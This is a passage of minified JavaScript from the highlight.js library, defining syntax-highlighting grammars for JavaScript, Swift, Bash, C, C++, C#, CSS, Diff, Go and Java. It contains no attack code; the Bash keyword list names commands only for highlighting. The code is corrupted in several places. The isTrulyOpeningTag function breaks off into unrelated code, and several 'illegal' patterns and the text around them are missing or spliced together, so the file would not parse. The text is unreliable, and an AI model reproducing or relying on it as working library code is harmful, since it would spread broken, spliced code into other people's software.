ea="\\.([0-9](_*[0-9])*)",ei="[0-9a-fA-F](_*[0-9a-fA-F])*",er={className:"number",variants:[{begin:`(\\b([0-9](_*[0-9])*)((${ea})|\\.)?|(${ea}))[eE][+-]?([0-9](_*[0-9])*)[fFdD]?\\b`},{begin:`\\b([0-9](_*[0-9])*)((${ea})[fFdD]?\\b|\\.([fFdD]\\b)?)`},{begin:`(${ea})[fFdD]?\\b`},{begin:"\\b([0-9](_*[0-9])*)[fFdD]\\b"},{begin:`\\b0[xX]((${ei})\\.?|(${ei})?\\.(${ei}))[pP][+-]?([0-9](_*[0-9])*)[fFdD]?\\b`},{begin:"\\b(0|[1-9](_*[0-9])*)[lL]?\\b"},{begin:`\\b0[xX](${ei})[lL]?\\b`},{begin:"\\b0(_*[0-7])*[lL]?\\b"},{begin:"\\b0[bB][01](_*[01])*[lL]?\\b"},],relevance:0};let es="[A-Za-z$_][0-9A-Za-z$_]*",el=["as","in","of","if","for","while","finally","var","new","function","do","return","void","else","break","catch","instanceof","with","throw","case","default","try","switch","continue","typeof","delete","let","yield","const","class","debugger","async","await","static","import","from","export","extends",],eo=["true","false","null","undefined","NaN","Infinity"],ec=["Object","Function","Boolean","Symbol","Math","Date","Number","BigInt","String","RegExp","Array","Float32Array","Float64Array","Int8Array","Uint8Array","Uint8ClampedArray","Int16Array","Int32Array","Uint16Array","Uint32Array","BigInt64Array","BigUint64Array","Set","Map","WeakSet","WeakMap","ArrayBuffer","SharedArrayBuffer","Atomics","DataView","JSON","Promise","Generator","GeneratorFunction","AsyncFunction","Reflect","Proxy","Intl","WebAssembly",],ed=["Error","EvalError","InternalError","RangeError","ReferenceError","SyntaxError","TypeError","URIError",],eg=["setInterval","setTimeout","clearInterval","clearTimeout","require","exports","eval","isFinite","isNaN","parseFloat","parseInt","decodeURI","decodeURIComponent","encodeURI","encodeURIComponent","escape","unescape",],eu=["arguments","this","super","console","window","document","localStorage","module","global",],eb=[].concat(eg,ec,ed);function em(e){var n;let t=e.regex,a=es,i={begin:/<[A-Za-z0-9\\._:-]+/,end:/\/[A-Za-z0-9\\._:-]+>|\/>/,isTrulyOpeningTag(e,n){let t=e[0].length+e.index,a=e.input[t];if("<"===a||","===a)return void n.ignoreMatch();let i;">"===a&&(((e,{after:n})=>{let t="",v={match:[/const|var|let/,/\s+/,a,/\s*/,/=\s*/,/(async\s*)?/,t.lookahead(w),],keywords:"async",className:{1:"keyword",3:"title.function"},contains:[f]};return{name:"Javascript",aliases:["js","jsx","mjs","cjs"],keywords:r,exports:{PARAMS_CONTAINS:h,CLASS_REFERENCE:$},illegal:/#(?![$_A-z])/,contains:[e.SHEBANG({label:"shebang",binary:"node",relevance:5}),{label:"use_strict",className:"meta",relevance:10,begin:/^\s*['"]use (strict|asm)['"]/},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,d,g,u,b,{match:/\$\d+/},o,$,{className:"attr",begin:a+t.lookahead(":"),relevance:0},v,{begin:"("+e.RE_STARTERS_RE+"|\\b(case|return|throw)\\b)\\s*",keywords:"return throw case",relevance:0,contains:[b,e.REGEXP_MODE,{className:"function",begin:w,returnBegin:!0,end:"\\s*=>",contains:[{className:"params",variants:[{begin:e.UNDERSCORE_IDENT_RE,relevance:0},{className:null,begin:/\(\s*\)/,skip:!0},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:r,contains:h},]},]},{begin:/,/,relevance:0},{match:/\s+/,relevance:0},{variants:[{begin:"<>",end:""},{match:/<[A-Za-z0-9\\._:-]+\s*\/>/},{begin:i.begin,"on:begin":i.isTrulyOpeningTag,end:i.end},],subLanguage:"xml",contains:[{begin:i.begin,end:i.end,skip:!0,contains:["self"]},]},]},{variants:[{match:[/function/,/\s+/,a,/(?=\s*\()/]},{match:[/function/,/\s*(?=\()/]},],className:{1:"keyword",3:"title.function"},label:"func.def",contains:[f],illegal:/%/},{beginKeywords:"while if switch catch for"},{begin:"\\b(?!function)"+e.UNDERSCORE_IDENT_RE+"\\([^()]*(\\([^()]*(\\([^()]*\\)[^()]*)*\\)[^()]*)*\\)\\s*\\{",returnBegin:!0,label:"func.def",contains:[f,e.inherit(e.TITLE_MODE,{begin:a,className:"title.function"}),]},{match:/\.\.\./,relevance:0},N,{match:"\\$"+a,relevance:0},{match:[/\bconstructor(?=\s*\()/],className:{1:"title.function"},contains:[f]},y,{relevance:0,match:/\b[A-Z][A-Z_0-9]+\b/,className:"variable.constant"},E,{match:[/get|set/,/\s+/,a,/(?=\()/],className:{1:"keyword",3:"title.function"},contains:[{begin:/\(\)/},f]},{match:/\$[(.]/},]}}let ep=e=>m(/\b/,e,/\w$/.test(e)?/\b/:/\B/),e8=["Protocol","Type"].map(ep),eh=["init","self"].map(ep),ef=["Any","Self"],eE=["actor","any","associatedtype","async","await",/as\?/,/as!/,"as","break","case","catch","class","continue","convenience","default","defer","deinit","didSet","distributed","do","dynamic","else","enum","extension","fallthrough",/fileprivate\(set\)/,"fileprivate","final","for","func","get","guard","if","import","indirect","infix",/init\?/,/init!/,"inout",/internal\(set\)/,"internal","in","is","isolated","nonisolated","lazy","let","mutating","nonmutating",/open\(set\)/,"open","operator","optional","override","postfix","precedencegroup","prefix",/private\(set\)/,"private","protocol",/public\(set\)/,"public","repeat","required","rethrows","return","set","some","static","struct","subscript","super","switch","throws","throw",/try\?/,/try!/,"try","typealias",/unowned\(safe\)/,/unowned\(unsafe\)/,"unowned","var","weak","where","while","willSet",],e$=["false","nil","true"],ey=["assignment","associativity","higherThan","left","lowerThan","none","right",],eN=["#colorLiteral","#column","#dsohandle","#else","#elseif","#endif","#error","#file","#fileID","#fileLiteral","#filePath","#function","#if","#imageLiteral","#keyPath","#line","#selector","#sourceLocation","#warn_unqualified_access","#warning",],ew=["abs","all","any","assert","assertionFailure","debugPrint","dump","fatalError","getVaList","isKnownUniquelyReferenced","max","min","numericCast","pointwiseMax","pointwiseMin","precondition","preconditionFailure","print","readLine","repeatElement","sequence","stride","swap","swift_unboxFromSwiftValueWithType","transcode","type","unsafeBitCast","unsafeDowncast","withExtendedLifetime","withUnsafeMutablePointer","withUnsafePointer","withVaList","withoutActuallyEscaping","zip",],ev=p(/[/=\-+!*%<>&|^~?]/,/[\u00A1-\u00A7]/,/[\u00A9\u00AB]/,/[\u00AC\u00AE]/,/[\u00B0\u00B1]/,/[\u00B6\u00BB\u00BF\u00D7\u00F7]/,/[\u2016-\u2017]/,/[\u2020-\u2027]/,/[\u2030-\u203E]/,/[\u2041-\u2053]/,/[\u2055-\u205E]/,/[\u2190-\u23FF]/,/[\u2500-\u2775]/,/[\u2794-\u2BFF]/,/[\u2E00-\u2E7F]/,/[\u3001-\u3003]/,/[\u3008-\u3020]/,/[\u3030]/),ex=p(ev,/[\u0300-\u036F]/,/[\u1DC0-\u1DFF]/,/[\u20D0-\u20FF]/,/[\uFE00-\uFE0F]/,/[\uFE20-\uFE2F]/),ek=m(ev,ex,"*"),eM=p(/[a-zA-Z_]/,/[\u00A8\u00AA\u00AD\u00AF\u00B2-\u00B5\u00B7-\u00BA]/,/[\u00BC-\u00BE\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u00FF]/,/[\u0100-\u02FF\u0370-\u167F\u1681-\u180D\u180F-\u1DBF]/,/[\u1E00-\u1FFF]/,/[\u200B-\u200D\u202A-\u202E\u203F-\u2040\u2054\u2060-\u206F]/,/[\u2070-\u20CF\u2100-\u218F\u2460-\u24FF\u2776-\u2793]/,/[\u2C00-\u2DFF\u2E80-\u2FFF]/,/[\u3004-\u3007\u3021-\u302F\u3031-\u303F\u3040-\uD7FF]/,/[\uF900-\uFD3D\uFD40-\uFDCF\uFDF0-\uFE1F\uFE30-\uFE44]/,/[\uFE47-\uFEFE\uFF00-\uFFFD]/),eO=p(eM,/\d/,/[\u0300-\u036F\u1DC0-\u1DFF\u20D0-\u20FF\uFE20-\uFE2F]/),eS=m(eM,eO,"*"),eA=m(/[A-Z]/,eO,"*"),eC=["autoclosure",m(/convention\(/,p("swift","block","c"),/\)/),"discardableResult","dynamicCallable","dynamicMemberLookup","escaping","frozen","GKInspectable","IBAction","IBDesignable","IBInspectable","IBOutlet","IBSegueAction","inlinable","main","nonobjc","NSApplicationMain","NSCopying","NSManaged",m(/objc\(/,eS,/\)/),"objc","objcMembers","propertyWrapper","requires_stored_property_inits","resultBuilder","testable","UIApplicationMain","unknown","usableFromInline",],eT=["iOS","iOSApplicationExtension","macOS","macOSApplicationExtension","macCatalyst","macCatalystApplicationExtension","watchOS","watchOSApplicationExtension","tvOS","tvOSApplicationExtension","swift",];var eR=Object.freeze({__proto__:null,grmr_bash(e){let n=e.regex,t={};Object.assign(t,{className:"variable",variants:[{begin:n.concat(/\$[\w\d#@][\w\d_]*/,"(?![\\w\\d])(?![$])")},{begin:/\$\{/,end:/\}/,contains:["self",{begin:/:-/,contains:[t]}]},]});let a={className:"subst",begin:/\$\(/,end:/\)/,contains:[e.BACKSLASH_ESCAPE]},i={begin:/<<-?\s*(?=\w+)/,starts:{contains:[e.END_SAME_AS_BEGIN({begin:/(\w+)/,end:/(\w+)/,className:"string"}),]}},r={className:"string",begin:/"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,t,a]};a.contains.push(r);let s={begin:/\$?\(\(/,end:/\)\)/,contains:[{begin:/\d+#[0-9a-f]+/,className:"number"},e.NUMBER_MODE,t,]},l=e.SHEBANG({binary:"(fish|bash|zsh|sh|csh|ksh|tcsh|dash|scsh)",relevance:10}),o={className:"function",begin:/\w[\w\d_]*\s*\(\s*\)\s*\{/,returnBegin:!0,contains:[e.inherit(e.TITLE_MODE,{begin:/\w[\w\d_]*/})],relevance:0};return{name:"Bash",aliases:["sh"],keywords:{$pattern:/\b[a-z][a-z0-9._-]+\b/,keyword:["if","then","else","elif","fi","for","while","in","do","done","case","esac","function",],literal:["true","false"],built_in:["break","cd","continue","eval","exec","exit","export","getopts","hash","pwd","readonly","return","shift","test","times","trap","umask","unset","alias","bind","builtin","caller","command","declare","echo","enable","help","let","local","logout","mapfile","printf","read","readarray","source","type","typeset","ulimit","unalias","set","shopt","autoload","bg","bindkey","bye","cap","chdir","clone","comparguments","compcall","compctl","compdescribe","compfiles","compgroups","compquote","comptags","comptry","compvalues","dirs","disable","disown","echotc","echoti","emulate","fc","fg","float","functions","getcap","getln","history","integer","jobs","kill","limit","log","noglob","popd","print","pushd","pushln","rehash","sched","setcap","setopt","stat","suspend","ttyctl","unfunction","unhash","unlimit","unsetopt","vared","wait","whence","where","which","zcompile","zformat","zftp","zle","zmodload","zparseopts","zprof","zpty","zregexparse","zsocket","zstyle","ztcp","chcon","chgrp","chown","chmod","cp","dd","df","dir","dircolors","ln","ls","mkdir","mkfifo","mknod","mktemp","mv","realpath","rm","rmdir","shred","sync","touch","truncate","vdir","b2sum","base32","base64","cat","cksum","comm","csplit","cut","expand","fmt","fold","head","join","md5sum","nl","numfmt","od","paste","ptx","pr","sha1sum","sha224sum","sha256sum","sha384sum","sha512sum","shuf","sort","split","sum","tac","tail","tr","tsort","unexpand","uniq","wc","arch","basename","chroot","date","dirname","du","echo","env","expr","factor","groups","hostid","id","link","logname","nice","nohup","nproc","pathchk","pinky","printenv","printf","pwd","readlink","runcon","seq","sleep","stat","stdbuf","stty","tee","test","timeout","tty","uname","unlink","uptime","users","who","whoami","yes",]},contains:[l,e.SHEBANG(),o,s,e.HASH_COMMENT_MODE,i,{match:/(\/[a-z._-]+)+/},r,{className:"",begin:/\\"/},{className:"string",begin:/'/,end:/'/},t,]}},grmr_c(e){let n=e.regex,t=e.COMMENT("//","$",{contains:[{begin:/\\\n/}]}),a="[a-zA-Z_]\\w*::",i="(decltype\\(auto\\)|"+n.optional(a)+"[a-zA-Z_]\\w*"+n.optional("<[^<>]+>")+")",r={className:"type",variants:[{begin:"\\b[a-z\\d_]*_t\\b"},{match:/\batomic_[a-z]{3,6}\b/},]},s={className:"string",variants:[{begin:'(u8?|U|L)?"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE]},{begin:"(u8?|U|L)?'(\\\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4,8}|[0-7]{3}|\\S)|.)",end:"'",illegal:"."},e.END_SAME_AS_BEGIN({begin:/(?:u8?|U|L)?R"([^()\\ ]{0,16})\(/,end:/\)([^()\\ ]{0,16})"/}),]},l={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)((ll|LL|l|L)(u|U)?|(u|U)(ll|LL|l|L)?|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"},],relevance:0},o={className:"meta",begin:/#\s*[a-z]+\b/,end:/$/,keywords:{keyword:"if else elif endif define undef warning error line pragma _Pragma ifdef ifndef include"},contains:[{begin:/\\\n/,relevance:0},e.inherit(s,{className:"string"}),{className:"string",begin:/<.*?>/},t,e.C_BLOCK_COMMENT_MODE,]},c={className:"title",begin:n.optional(a)+e.IDENT_RE,relevance:0},d=n.optional(a)+e.IDENT_RE+"\\s*\\(",g={keyword:["asm","auto","break","case","continue","default","do","else","enum","extern","for","fortran","goto","if","inline","register","restrict","return","sizeof","struct","switch","typedef","union","volatile","while","_Alignas","_Alignof","_Atomic","_Generic","_Noreturn","_Static_assert","_Thread_local","alignas","alignof","noreturn","static_assert","thread_local","_Pragma",],type:["float","double","signed","unsigned","int","short","long","char","void","_Bool","_Complex","_Imaginary","_Decimal32","_Decimal64","_Decimal128","const","static","complex","bool","imaginary",],literal:"true false NULL",built_in:"std string wstring cin cout cerr clog stdin stdout stderr stringstream istringstream ostringstream auto_ptr deque list queue stack vector map set pair bitset multiset multimap unordered_set unordered_map unordered_multiset unordered_multimap priority_queue make_pair array shared_ptr abort terminate abs acos asin atan2 atan calloc ceil cosh cos exit exp fabs floor fmod fprintf fputs free frexp fscanf future isalnum isalpha iscntrl isdigit isgraph islower isprint ispunct isspace isupper isxdigit tolower toupper labs ldexp log10 log malloc realloc memchr memcmp memcpy memset modf pow printf putchar puts scanf sinh sin snprintf sprintf sqrt sscanf strcat strchr strcmp strcpy strcspn strlen strncat strncmp strncpy strpbrk strrchr strspn strstr tanh tan vfprintf vprintf vsprintf endl initializer_list unique_ptr"},u=[o,r,t,e.C_BLOCK_COMMENT_MODE,l,s],b={variants:[{begin:/=/,end:/;/},{begin:/\(/,end:/\)/},{beginKeywords:"new throw return else",end:/;/},],keywords:g,contains:u.concat([{begin:/\(/,end:/\)/,keywords:g,contains:u.concat(["self"]),relevance:0},]),relevance:0},m={begin:"("+i+"[\\*&\\s]+)+"+d,returnBegin:!0,end:/[{;=]/,excludeEnd:!0,keywords:g,illegal:/[^\w\s\*&:<>.]/,contains:[{begin:"decltype\\(auto\\)",keywords:g,relevance:0},{begin:d,returnBegin:!0,contains:[e.inherit(c,{className:"title.function"}),],relevance:0},{relevance:0,match:/,/},{className:"params",begin:/\(/,end:/\)/,keywords:g,relevance:0,contains:[t,e.C_BLOCK_COMMENT_MODE,s,l,r,{begin:/\(/,end:/\)/,keywords:g,relevance:0,contains:["self",t,e.C_BLOCK_COMMENT_MODE,s,l,r]},]},r,t,e.C_BLOCK_COMMENT_MODE,o,]};return{name:"C",aliases:["h"],keywords:g,disableAutodetect:!0,illegal:"=]/,contains:[{beginKeywords:"final class struct"},e.TITLE_MODE,]},]),exports:{preprocessor:o,strings:s,keywords:g}}},grmr_cpp(e){let n=e.regex,t=e.COMMENT("//","$",{contains:[{begin:/\\\n/}]}),a="[a-zA-Z_]\\w*::",i="(?!struct)(decltype\\(auto\\)|"+n.optional(a)+"[a-zA-Z_]\\w*"+n.optional("<[^<>]+>")+")",r={className:"type",begin:"\\b[a-z\\d_]*_t\\b"},s={className:"string",variants:[{begin:'(u8?|U|L)?"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE]},{begin:"(u8?|U|L)?'(\\\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4,8}|[0-7]{3}|\\S)|.)",end:"'",illegal:"."},e.END_SAME_AS_BEGIN({begin:/(?:u8?|U|L)?R"([^()\\ ]{0,16})\(/,end:/\)([^()\\ ]{0,16})"/}),]},l={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)((ll|LL|l|L)(u|U)?|(u|U)(ll|LL|l|L)?|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"},],relevance:0},o={className:"meta",begin:/#\s*[a-z]+\b/,end:/$/,keywords:{keyword:"if else elif endif define undef warning error line pragma _Pragma ifdef ifndef include"},contains:[{begin:/\\\n/,relevance:0},e.inherit(s,{className:"string"}),{className:"string",begin:/<.*?>/},t,e.C_BLOCK_COMMENT_MODE,]},c={className:"title",begin:n.optional(a)+e.IDENT_RE,relevance:0},d=n.optional(a)+e.IDENT_RE+"\\s*\\(",g={type:["bool","char","char16_t","char32_t","char8_t","double","float","int","long","short","void","wchar_t","unsigned","signed","const","static",],keyword:["alignas","alignof","and","and_eq","asm","atomic_cancel","atomic_commit","atomic_noexcept","auto","bitand","bitor","break","case","catch","class","co_await","co_return","co_yield","compl","concept","const_cast|10","consteval","constexpr","constinit","continue","decltype","default","delete","do","dynamic_cast|10","else","enum","explicit","export","extern","false","final","for","friend","goto","if","import","inline","module","mutable","namespace","new","noexcept","not","not_eq","nullptr","operator","or","or_eq","override","private","protected","public","reflexpr","register","reinterpret_cast|10","requires","return","sizeof","static_assert","static_cast|10","struct","switch","synchronized","template","this","thread_local","throw","transaction_safe","transaction_safe_dynamic","true","try","typedef","typeid","typename","union","using","virtual","volatile","while","xor","xor_eq",],literal:["NULL","false","nullopt","nullptr","true"],built_in:["_Pragma"],_type_hints:["any","auto_ptr","barrier","binary_semaphore","bitset","complex","condition_variable","condition_variable_any","counting_semaphore","deque","false_type","future","imaginary","initializer_list","istringstream","jthread","latch","lock_guard","multimap","multiset","mutex","optional","ostringstream","packaged_task","pair","promise","priority_queue","queue","recursive_mutex","recursive_timed_mutex","scoped_lock","set","shared_future","shared_lock","shared_mutex","shared_timed_mutex","shared_ptr","stack","string_view","stringstream","timed_mutex","thread","true_type","tuple","unique_lock","unique_ptr","unordered_map","unordered_multimap","unordered_multiset","unordered_set","variant","vector","weak_ptr","wstring","wstring_view",]},u={className:"function.dispatch",relevance:0,keywords:{_hint:["abort","abs","acos","apply","as_const","asin","atan","atan2","calloc","ceil","cerr","cin","clog","cos","cosh","cout","declval","endl","exchange","exit","exp","fabs","floor","fmod","forward","fprintf","fputs","free","frexp","fscanf","future","invoke","isalnum","isalpha","iscntrl","isdigit","isgraph","islower","isprint","ispunct","isspace","isupper","isxdigit","labs","launder","ldexp","log","log10","make_pair","make_shared","make_shared_for_overwrite","make_tuple","make_unique","malloc","memchr","memcmp","memcpy","memset","modf","move","pow","printf","putchar","puts","realloc","scanf","sin","sinh","snprintf","sprintf","sqrt","sscanf","std","stderr","stdin","stdout","strcat","strchr","strcmp","strcpy","strcspn","strlen","strncat","strncmp","strncpy","strpbrk","strrchr","strspn","strstr","swap","tan","tanh","terminate","to_underlying","tolower","toupper","vfprintf","visit","vprintf","vsprintf",]},begin:n.concat(/\b/,/(?!decltype)/,/(?!if)/,/(?!for)/,/(?!switch)/,/(?!while)/,e.IDENT_RE,n.lookahead(/(<[^<>]+>|)\s*\(/))},b=[u,o,r,t,e.C_BLOCK_COMMENT_MODE,l,s],m={variants:[{begin:/=/,end:/;/},{begin:/\(/,end:/\)/},{beginKeywords:"new throw return else",end:/;/},],keywords:g,contains:b.concat([{begin:/\(/,end:/\)/,keywords:g,contains:b.concat(["self"]),relevance:0},]),relevance:0},p={className:"function",begin:"("+i+"[\\*&\\s]+)+"+d,returnBegin:!0,end:/[{;=]/,excludeEnd:!0,keywords:g,illegal:/[^\w\s\*&:<>.]/,contains:[{begin:"decltype\\(auto\\)",keywords:g,relevance:0},{begin:d,returnBegin:!0,contains:[c],relevance:0},{begin:/::/,relevance:0},{begin:/:/,endsWithParent:!0,contains:[s,l]},{relevance:0,match:/,/},{className:"params",begin:/\(/,end:/\)/,keywords:g,relevance:0,contains:[t,e.C_BLOCK_COMMENT_MODE,s,l,r,{begin:/\(/,end:/\)/,keywords:g,relevance:0,contains:["self",t,e.C_BLOCK_COMMENT_MODE,s,l,r]},]},r,t,e.C_BLOCK_COMMENT_MODE,o,]};return{name:"C++",aliases:["cc","c++","h++","hpp","hh","hxx","cxx"],keywords:g,illegal:"",keywords:g,contains:["self",r]},{begin:e.IDENT_RE+"::",keywords:g},{match:[/\b(?:enum(?:\s+(?:class|struct))?|class|struct|union)/,/\s+/,/\w+/,],className:{1:"keyword",3:"title.class"}},])}},grmr_csharp(e){let n={keyword:["abstract","as","base","break","case","catch","class","const","continue","do","else","event","explicit","extern","finally","fixed","for","foreach","goto","if","implicit","in","interface","internal","is","lock","namespace","new","operator","out","override","params","private","protected","public","readonly","record","ref","return","scoped","sealed","sizeof","stackalloc","static","struct","switch","this","throw","try","typeof","unchecked","unsafe","using","virtual","void","volatile","while",].concat(["add","alias","and","ascending","async","await","by","descending","equals","from","get","global","group","init","into","join","let","nameof","not","notnull","on","or","orderby","partial","remove","select","set","unmanaged","value|0","var","when","where","with","yield",]),built_in:["bool","byte","char","decimal","delegate","double","dynamic","enum","float","int","long","nint","nuint","object","sbyte","short","string","ulong","uint","ushort",],literal:["default","false","null","true"]},t=e.inherit(e.TITLE_MODE,{begin:"[a-zA-Z](\\.?\\w)*"}),a={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)(u|U|l|L|ul|UL|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"},],relevance:0},i={className:"string",begin:'@"',end:'"',contains:[{begin:'""'}]},r=e.inherit(i,{illegal:/\n/}),s={className:"subst",begin:/\{/,end:/\}/,keywords:n},l=e.inherit(s,{illegal:/\n/}),o={className:"string",begin:/\$"/,end:'"',illegal:/\n/,contains:[{begin:/\{\{/},{begin:/\}\}/},e.BACKSLASH_ESCAPE,l,]},c={className:"string",begin:/\$@"/,end:'"',contains:[{begin:/\{\{/},{begin:/\}\}/},{begin:'""'},s,]},d=e.inherit(c,{illegal:/\n/,contains:[{begin:/\{\{/},{begin:/\}\}/},{begin:'""'},l]});s.contains=[c,o,i,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,a,e.C_BLOCK_COMMENT_MODE,],l.contains=[d,o,r,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,a,e.inherit(e.C_BLOCK_COMMENT_MODE,{illegal:/\n/}),];let g={variants:[c,o,i,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},u={begin:"<",end:">",contains:[{beginKeywords:"in out"},t]},b=e.IDENT_RE+"(<"+e.IDENT_RE+"(\\s*,\\s*"+e.IDENT_RE+")*>)?(\\[\\])?",m={begin:"@"+e.IDENT_RE,relevance:0};return{name:"C#",aliases:["cs","c#"],keywords:n,illegal:/::/,contains:[e.COMMENT("///","$",{returnBegin:!0,contains:[{className:"doctag",variants:[{begin:"///",relevance:0},{begin:""},{begin:""},]},]}),e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{className:"meta",begin:"#",end:"$",keywords:{keyword:"if else elif endif define undef warning error line region endregion pragma checksum"}},g,a,{beginKeywords:"class interface",relevance:0,end:/[{;=]/,illegal:/[^\s:,]/,contains:[{beginKeywords:"where class"},t,u,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,]},{beginKeywords:"namespace",relevance:0,end:/[{;=]/,illegal:/[^\s:]/,contains:[t,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{beginKeywords:"record",relevance:0,end:/[{;=]/,illegal:/[^\s:]/,contains:[t,u,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{className:"meta",begin:"^\\s*\\[(?=[\\w])",excludeBegin:!0,end:"\\]",excludeEnd:!0,contains:[{className:"string",begin:/"/,end:/"/},]},{beginKeywords:"new return throw await else",relevance:0},{className:"function",begin:"("+b+"\\s+)+"+e.IDENT_RE+"\\s*(<[^=]+>\\s*)?\\(",returnBegin:!0,end:/\s*[{;=]/,excludeEnd:!0,keywords:n,contains:[{beginKeywords:"public private protected static internal protected abstract async extern override unsafe virtual new sealed partial",relevance:0},{begin:e.IDENT_RE+"\\s*(<[^=]+>\\s*)?\\(",returnBegin:!0,contains:[e.TITLE_MODE,u],relevance:0},{match:/\(\)/},{className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:n,relevance:0,contains:[g,a,e.C_BLOCK_COMMENT_MODE]},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,]},m,]}},grmr_css(e){let n=e.regex,t=X(e),a=[e.APOS_STRING_MODE,e.QUOTE_STRING_MODE];return{name:"CSS",case_insensitive:!0,illegal:/[=|'\$]/,keywords:{keyframePosition:"from to"},classNameAliases:{keyframePosition:"selector-tag"},contains:[t.BLOCK_COMMENT,{begin:/-(webkit|moz|ms|o)-(?=[a-z])/},t.CSS_NUMBER_MODE,{className:"selector-id",begin:/#[A-Za-z0-9_-]+/,relevance:0},{className:"selector-class",begin:"\\.[a-zA-Z-][a-zA-Z0-9_-]*",relevance:0},t.ATTRIBUTE_SELECTOR_MODE,{className:"selector-pseudo",variants:[{begin:":("+Y.join("|")+")"},{begin:":(:)?("+ee.join("|")+")"},]},t.CSS_VARIABLE,{className:"attribute",begin:"\\b("+en.join("|")+")\\b"},{begin:/:/,end:/[;}{]/,contains:[t.BLOCK_COMMENT,t.HEXCOLOR,t.IMPORTANT,t.CSS_NUMBER_MODE,...a,{begin:/(url|data-uri)\(/,end:/\)/,relevance:0,keywords:{built_in:"url data-uri"},contains:[...a,{className:"string",begin:/[^)]/,endsWithParent:!0,excludeEnd:!0},]},t.FUNCTION_DISPATCH,]},{begin:n.lookahead(/@/),end:"[{;]",relevance:0,illegal:/:/,contains:[{className:"keyword",begin:/@-?\w[\w]*(-\w+)*/},{begin:/\s/,endsWithParent:!0,excludeEnd:!0,relevance:0,keywords:{$pattern:/[a-z-]+/,keyword:"and or not only",attribute:J.join(" ")},contains:[{begin:/[a-z-]+(?=:)/,className:"attribute"},...a,t.CSS_NUMBER_MODE,]},]},{className:"selector-tag",begin:"\\b("+V.join("|")+")\\b"},]}},grmr_diff(e){let n=e.regex;return{name:"Diff",aliases:["patch"],contains:[{className:"meta",relevance:10,match:n.either(/^@@ +-\d+,\d+ +\+\d+,\d+ +@@/,/^\*\*\* +\d+,\d+ +\*\*\*\*$/,/^--- +\d+,\d+ +----$/)},{className:"comment",variants:[{begin:n.either(/Index: /,/^index/,/={3,}/,/^-{3}/,/^\*{3} /,/^\+{3}/,/^diff --git/),end:/$/},{match:/^\*{15}$/},]},{className:"addition",begin:/^\+/,end:/$/},{className:"deletion",begin:/^-/,end:/$/},{className:"addition",begin:/^!/,end:/$/},]}},grmr_go(e){let n={keyword:["break","case","chan","const","continue","default","defer","else","fallthrough","for","func","go","goto","if","import","interface","map","package","range","return","select","struct","switch","type","var",],type:["bool","byte","complex64","complex128","error","float32","float64","int8","int16","int32","int64","string","uint8","uint16","uint32","uint64","int","uint","uintptr","rune",],literal:["true","false","iota","nil"],built_in:["append","cap","close","complex","copy","imag","len","make","new","panic","print","println","real","recover","delete",]};return{name:"Go",aliases:["golang"],keywords:n,illegal:"e(n,t,a-1))}("(?:<"+t+"~~~(?:\\s*,\\s*"+t+"~~~)*>)?",/~~~/g,2),i={keyword:["synchronized","abstract","private","var","static","if","const ","for","while","strictfp","finally","protected","import","native","final","void","enum","else","break","transient","catch","instanceof","volatile","case","assert","package","default","public","try","switch","continue","throws","protected","public","private","module","requires","exports","do","sealed","yield","permits",],literal:["false","true","null"],type:["char","boolean","long","float","int","byte","short","double",],built_in:["super","this"]},r={className:"meta",begin:"@"+t,contains:[{begin:/\(/,end:/\)/,contains:["self"]},]},s={className:"params",begin:/\(/,end:/\)/,keywords:i,relevance:0,contains:[e.C_BLOCK_COMMENT_MODE],endsParent:!0};return{name:"Java",aliases:["jsp"],keywords:i,illegal:/<\/|#/,contains:[e.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{begin:/\w+@/,relevance:0},{className:"doctag",begin:"@[A-Za-z]+"},]}),{begin:/import java\.[a-z]+\./,keywords:"import",relevance:2},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{begin:/"""/,end:/"""/,className:"string",contains:[e.BACKSLASH_ESCAPE]},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,{match:[/\b(?:class|interface|enum|extends|implements|new)/,/\s+/,t,],className:{1:"keyword",3:"title.class"}},{match:/non-sealed/,scope:"keyword"},{begin:[n.concat(/(?!else)/,t),/\s+/,t,/\s+/,/=(?!=)/],className:{1:"type",3:"variable",5:"operator"}},{begin:[/record/,/\s+/,t],className:{1:"keyword",3:"title.class"},contains:[s,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{beginKeywords:"new throw return 